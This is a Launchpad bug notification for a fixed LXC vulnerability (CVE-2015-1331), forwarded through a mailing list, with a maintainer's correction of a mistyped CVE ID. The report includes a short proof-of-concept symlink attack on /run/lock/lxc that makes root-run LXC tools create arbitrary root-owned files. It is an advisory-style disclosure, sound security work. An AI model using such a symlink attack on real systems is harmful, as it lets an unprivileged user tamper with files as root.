[Touch-packages] [Bug 1470842] Re: lxc tools lock handling vulnerable to symlink attack

Wed, 22 Jul 2015 12:31:54 -0700 

It is worth noting that I typoed the CVE ID in the changelog.
CVE-2015-1131 should have been CVE-2015-1331.

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1334

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1470842

Title:
  lxc tools lock handling vulnerable to symlink attack

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found, that when lxc
  tools, e.g. lxc-info, are run as user root, a symlink attack on
  /run/lock/lxc can be used to create arbitrary files as the root user.
  The malicious user has to set up the symlink attack before
  /run/lock/lxc/ exists, which is only possible prior to the
  administrator creating the first container or automatic startup
  starting after boot starting one.

  PoC:

  $ mkdir -p /run/lock/lxc/var/lib/lxc
  $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
  $ stat /test
  stat: cannot stat ‘/test’: No such file or directory
  $ sudo lxc-create --name somename --template download # An admin would run 
this command
  ...
  Distribution: ubuntu
  Release: trusty
  Architecture: amd64
  ...
  $ stat /test
    File: ‘/test’
    Size: 0             Blocks: 0          IO Block: 4096   regular empty file
  Device: fd01h/64769d  Inode: 52559       Links: 1
  Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2015-07-02 10:40:55.703646793 -0500
  Modify: 2015-07-02 10:40:55.703646793 -0500
  Change: 2015-07-02 10:40:55.703646793 -0500
   Birth: -

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: 1.0.7-0ubuntu0.1
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
   *** 1.0.7-0ubuntu0.1 0
          500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       1.0.3-0ubuntu3 0
          500 http://archivexxx/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : [email protected]
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to